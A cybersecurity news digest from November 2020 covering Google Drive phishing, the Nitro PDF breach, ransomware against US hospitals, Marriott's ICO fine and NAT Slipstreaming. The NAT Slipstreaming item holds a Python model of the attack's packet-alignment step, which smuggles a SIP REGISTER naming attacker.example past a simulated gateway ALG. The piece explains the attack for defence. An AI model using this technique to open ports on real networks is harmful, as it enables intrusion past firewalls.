CYBER PULSE: EDITION 136 | 5 NOVEMBER 2020


Cyber Security Training Courses features the latest roundup of cyber news stories on behalf of QA. Read the latest edition of Cyber Pulse:

Scammers use Google Drive notifications to send malicious links


Cybercriminals are sending malicious links to hundreds of thousands of users via Google Drive notifications, abusing a legitimate collaboration feature to trick users into clicking. According to reports, the attack relies on Google Drive's built-in sharing mechanism, which lets a user generate push notifications or emails inviting other people to collaborate on a Google Doc. Attackers are using this feature to send mobile users Google Drive notifications inviting them to collaborate on documents that contain malicious links.

Because they are sent via Google Drive, the notifications come from Google’s no-reply email address, making them appear more legitimate. Other iterations of the attack are sent via email (instead of by notification) and include the malicious link right in the email. The attack is targeting hundreds of thousands of Google users, with the notifications being sent in Russian or broken English. The Google Drive notifications come with various lures. Many claim to be “personal notifications” from Google Drive, with one lure entitled “Personal Notification No 8482” telling the victim they haven’t signed into their account in a while. These threaten that the account will be deleted in 24 hours unless they sign in via a (malicious) link.

With the prevalence of working from home due to the coronavirus pandemic, attackers are increasingly leveraging collaboration and remote-work tools, including Google offerings. In May, researchers warned of a series of phishing campaigns using Google Firebase storage URLs. These used the reputation of Google’s cloud infrastructure to dupe victims and skate by secure email gateways.

Australian Nitro PDF services firm breached

The Australian company behind the popular PDF software Nitro PDF has suffered a data breach that may have affected several other well-known organisations. Nitro PDF has 1.8m licensed users and thousands of business customers, including the likes of Google, Apple and Microsoft. The company also offers a cloud service that customers can use to share documents with co-workers and with employees at other organisations.

In an advisory published on the investor relations section of its site, Nitro Software informed its customers that it had suffered a "low-impact security incident" in which no sensitive financial data was affected. However, security researchers have revealed that the company's user and document databases, along with 1TB of documents allegedly stolen from the company, are being sold online in a private auction. The document database reportedly contains 17,137 documents from Amazon, 6,405 from Apple, 32,153 from Google and 2,390 from Microsoft.

NAT Slipstreaming exploit can bypass local protections

New research has demonstrated a technique that allows an attacker to bypass firewall protection and remotely reach any TCP/UDP service on a victim's machine. Called NAT Slipstreaming, the method involves sending the target a link to a malicious site (or a legitimate site carrying malicious ads) that, when visited, ultimately causes the victim's NAT gateway or firewall to open any TCP/UDP port on the victim's machine to the attacker, circumventing the port restrictions that browsers impose on outbound connections.

The findings were revealed by privacy and security researcher Samy Kamkar. In an analysis, Kamkar stated:

"NAT Slipstreaming exploits the user's browser in conjunction with the Application Level Gateway (ALG) connection tracking mechanism built into NATs, routers, and firewalls by chaining internal IP extraction via timing attack or WebRTC, automated remote MTU and IP fragmentation discovery, TCP packet size massaging, TURN authentication misuse, precise packet boundary control, and protocol confusion through browser abuse."

NAT Slipstreaming works by exploiting IP fragmentation and TCP segmentation to remotely control where packet boundaries fall, so that a packet sent by the browser begins with a SIP method such as REGISTER or INVITE. The gateway's SIP ALG then parses that packet as a genuine SIP message and opens a pinhole to the internal IP address and port named in it, which the attacker controls. Kamkar has published the full proof-of-concept code for NAT Slipstreaming.
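To make the packet-boundary step concrete, the following is a constructed model written for this edition; it is not Kamkar's proof of concept. It assumes an MTU of 1500 with no IP or TCP options, a toy SIP ALG that classifies each TCP segment to port 5060 by its first bytes without reassembling the stream, and an attacker-chosen internal IP and port. The hostnames, addresses and port numbers are placeholders.

```python
import re

# Constructed example (not Kamkar's PoC): a toy model of NAT Slipstreaming's
# packet boundary control step and of a naive SIP ALG that inspects each TCP
# segment in isolation. Sizes, names, IPs and ports are assumptions.
MTU = 1500
IP_TCP_HEADERS = 40           # 20-byte IPv4 + 20-byte TCP, no options (assumed)
MSS = MTU - IP_TCP_HEADERS    # payload bytes per full-size segment


def sip_register(internal_ip, port):
    """The SIP REGISTER the attacker wants the ALG to see at the start of a
    packet. Via/Contact carry the victim's internal IP (learned via WebRTC in
    the real attack) and the port the attacker wants opened."""
    return (
        "REGISTER sip:attacker.example SIP/2.0\r\n"
        "Via: SIP/2.0/TCP {ip}:{port};branch=z9hG4bK-slip\r\n"
        "From: <sip:slip@attacker.example>\r\n"
        "To: <sip:slip@attacker.example>\r\n"
        "Call-ID: slip@{ip}\r\n"
        "CSeq: 1 REGISTER\r\n"
        "Contact: <sip:slip@{ip}:{port};transport=tcp>\r\n"
        "Content-Length: 0\r\n\r\n"
    ).format(ip=internal_ip, port=port).encode()


def http_post(padding_len, sip):
    """Bytes the browser puts on the wire for a form POST to attacker:5060.
    Only the body is attacker-controlled: padding followed by the SIP text."""
    body = b"A" * padding_len + sip
    head = (
        "POST /submit HTTP/1.1\r\n"
        "Host: attacker.example:5060\r\n"
        "Content-Type: text/plain\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode()
    return head + body


def tcp_segments(stream, mss=MSS):
    """Split the byte stream into segments the way TCP would at this MSS."""
    return [stream[i:i + mss] for i in range(0, len(stream), mss)]


def find_padding(sip, mss=MSS, limit=2 * MSS):
    """Smallest padding that makes the SIP message begin exactly on a segment
    boundary. Brute force, because the Content-Length digit count changes the
    HTTP header size as the padding grows."""
    for pad in range(limit):
        req = http_post(pad, sip)
        offset = len(req) - len(sip)      # where the SIP text starts
        if offset % mss == 0:
            return pad
    raise ValueError("no alignment found within limit")


CONTACT_RE = re.compile(rb"^Contact:\s*<sip:[^@>]*@(\d+\.\d+\.\d+\.\d+):(\d+)", re.M)


def naive_sip_alg(segment):
    """Models a gateway ALG that treats any segment to port 5060 whose payload
    starts with a SIP request line as SIP, with no TCP reassembly. Returns the
    (internal_ip, port) it would open a pinhole to, or None."""
    if not segment.startswith((b"REGISTER ", b"INVITE ")):
        return None
    m = CONTACT_RE.search(segment)
    if not m:
        return None
    return m.group(1).decode(), int(m.group(2))


def pinholes_opened(stream):
    """Run every segment of the stream past the toy ALG."""
    return [h for h in map(naive_sip_alg, tcp_segments(stream)) if h]


if __name__ == "__main__":
    sip = sip_register("192.168.1.23", 3389)
    print("unaligned POST  ->", pinholes_opened(http_post(0, sip)))
    pad = find_padding(sip)
    print(f"padding={pad}   ->", pinholes_opened(http_post(pad, sip)))
```

With no padding the single segment begins with `POST`, so the ALG ignores it; once the body is padded so that the REGISTER text lands at a segment boundary, the ALG reads a REGISTER and would forward the named port to the victim's internal address. The real attack must first learn the internal IP and the path MTU, which is what the timing/WebRTC and fragmentation-discovery stages in Kamkar's description provide. The practical defence on the gateway side is to disable the SIP ALG.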

Wave of ransomware attacks on US hospitals

A ransomware group responsible for a new wave of attacks against US hospitals is laying the groundwork to cripple at least 10 more, according to cyber security researchers. The analysis comes a day after the FBI and two other federal agencies issued a warning about an imminent and credible threat to hospitals and healthcare providers from cyberattacks, including ransomware capable of locking entire computer networks. The hacking group responsible has already hit at least nine hospitals in three weeks, crippling critical computer systems and demanding multimillion-dollar ransoms.

The US Government issued a joint cyber security advisory to guide hospitals and healthcare providers who may be victims of a malware attack. In it, the agencies highlighted the damage that the malicious tools used by attackers – Trickbot, a so-called botnet of infected computers, and Ryuk, a type of ransomware – can cause and how swiftly they may steal medical data. Several hospital companies have reported being struck by cyberattacks in recent days, including the University of Vermont Health Network, which includes six hospitals.

Marriott fined by regulator for 2014 data breach

The Information Commissioner's Office (ICO) has fined Marriott £18.4 million over a 2014 data breach, heavily reducing the penalty originally planned because of Covid-19 disruption. The Marriott hotel group was subject to a data breach that began in 2014 and affected the Starwood hotel chain, which Marriott agreed to acquire in 2015.

At the time, threat actors were able to infiltrate Starwood systems and execute malware via a web shell, including remote access tools and credential harvesting software. The attackers were then able to enter databases used to store guest reservation data including names, email addresses, phone numbers, passport numbers, travel details, and loyalty program information. The compromise continued until 2018, and over the course of four years, information belonging to roughly 339 million guests was stolen. In total, seven million records relating to UK guests were exposed.

The ICO found that the company failed to "put appropriate technical or organisational measures in place" when processing personal data, as required by the GDPR, and so contravened the data protection requirements that have been enforced under the GDPR since 2018.

Information Commissioner Elizabeth Denham said:

"Personal data is precious and businesses have to look after it. Millions of people's data was affected by Marriott's failure; thousands contacted a helpline and others may have had to take action to protect their personal data because the company they trusted it with had not. When a business fails to look after customers' data, the impact is not just a possible fine, what matters most is the public whose data they had a duty to protect."

Last month, British Airways was fined £20 million by the ICO after cyberattackers stole information belonging to over 400,000 customers in 2018. 

Edited and compiled by QA's Director of Cyber, Richard Beck.